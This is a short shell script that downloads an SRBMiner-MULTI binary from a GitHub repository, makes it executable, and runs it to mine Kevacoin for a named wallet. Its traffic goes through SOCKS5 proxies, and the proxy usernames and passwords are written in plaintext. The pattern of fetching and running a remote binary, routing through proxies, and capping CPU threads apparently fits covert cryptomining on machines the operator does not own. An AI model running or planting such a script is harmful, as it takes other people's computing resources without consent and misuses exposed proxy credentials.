#!/bin/sh
curl -v -x "socks5://ingfoingfo-rotate:maszZeehh@p.webshare.io:80/" webshare.io/
wget https://github.com/AhmadTugiman/gembel/raw/main/SRBMiner-MULTI
chmod 700 SRBMiner-MULTI
./SRBMiner-MULTI --algorithm randomkeva --pool de.kevacoin.herominers.com:1163 --wallet VBQfjixEZGCg8apk2H3R27ENKsgzFaCLy9 --worker NABILA --password x --cpu-threads 4 --disable-gpu --proxy=socks5://ingfoingfo:maszZeehh@154.12.98.44:5128
 
